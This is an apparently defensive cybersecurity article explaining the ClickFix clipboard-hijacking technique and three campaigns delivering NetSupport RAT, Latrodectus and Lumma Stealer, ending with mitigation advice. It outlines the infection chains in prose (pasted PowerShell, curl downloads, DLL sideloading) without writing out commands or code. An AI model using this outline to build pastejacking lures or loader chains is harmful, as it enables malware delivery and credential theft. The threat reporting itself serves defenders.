In the evolving landscape of cyber threats, a deceptive social engineering tactic known as ClickFix has emerged as a significant concern. First identified in late 2024, ClickFix has seen a dramatic increase in usage throughout the first half of 2025, becoming a prevalent method for cybercriminals to infiltrate systems.
Understanding ClickFix
ClickFix is a social engineering technique that manipulates users into executing malicious commands under the guise of resolving common computer issues. Unlike traditional methods that rely on exploit kits or malicious attachments, ClickFix leverages clipboard hijacking. Attackers inject obfuscated commands into a user’s clipboard and instruct them to paste and execute these commands using Windows shell shortcuts, such as Win+R or Win+X. This approach effectively bypasses many standard security measures, allowing malware to be deployed discreetly.
Recent Campaigns Utilizing ClickFix
Cybersecurity researchers have identified several campaigns employing ClickFix to distribute various malware families:
1. NetSupport RAT Distribution
In this campaign, attackers use loader domains that mimic legitimate services like DocuSign and Okta. Victims are directed to landing pages that prompt them to open the Run dialog (Win+R) and paste an injected PowerShell command. Executing this command downloads a ZIP archive containing a malicious DLL loader. This DLL sideloads itself via a legitimate Java executable (jp2launcher.exe), retrieves encrypted payloads using curl.exe, and ultimately launches NetSupport RAT’s client32.exe in memory.
2. Latrodectus Deployment
Another series of attacks combines ClickFix lures with ClearFake infrastructure. Victims visiting compromised websites are redirected to fake verification pages that inject an encoded PowerShell command into the clipboard. When executed, this command uses curl.exe to fetch a JavaScript downloader that retrieves an MSI installer. This installer sideloads Latrodectus as a malicious DLL (libcef.dll) within a legitimate process. The final DLL injects shellcode to harvest browser credentials and exfiltrate data to a remote server.
3. Lumma Stealer Propagation
A third wave of intrusions routes victims through typosquatted IP-logging domains to deliver Lumma Stealer. Each victim receives a unique MSHTA command that downloads a heavily obfuscated, Base64-encoded PowerShell script. This script drops and executes an AutoIt-based loader (PartyContinued.exe), which unpacks a CAB archive (Boat.pst) and constructs an AutoIt3 engine binary (Slovenia.com) to launch the Lumma payload. The loader then executes a series of command-line operations to extract, assemble, and run the stealer without further user interaction.
Mechanism of Infection via Clipboard Hijacking
At the core of the ClickFix vector is a technique known as pastejacking. Malicious JavaScript on a compromised webpage overwrites the user’s clipboard with an obfuscated command string and displays innocuous instructions to verify or fix an issue. When the user pastes this command into the Run dialog or terminal, they unwittingly execute a script that downloads and stages additional malicious components.
Implications and Recommendations
The rise of ClickFix underscores the need for heightened awareness and vigilance among users. To mitigate the risks associated with this technique, consider the following recommendations:
– User Education: Train users to recognize and avoid suspicious prompts that instruct them to copy and paste commands into system dialogs.
– Technical Safeguards: Implement security measures that can detect and block unauthorized script executions initiated through clipboard manipulation.
– Regular Updates: Keep all software and systems updated to patch vulnerabilities that could be exploited by such social engineering tactics.
By understanding the mechanics of ClickFix and adopting proactive security practices, individuals and organizations can better protect themselves against this evolving cyber threat.
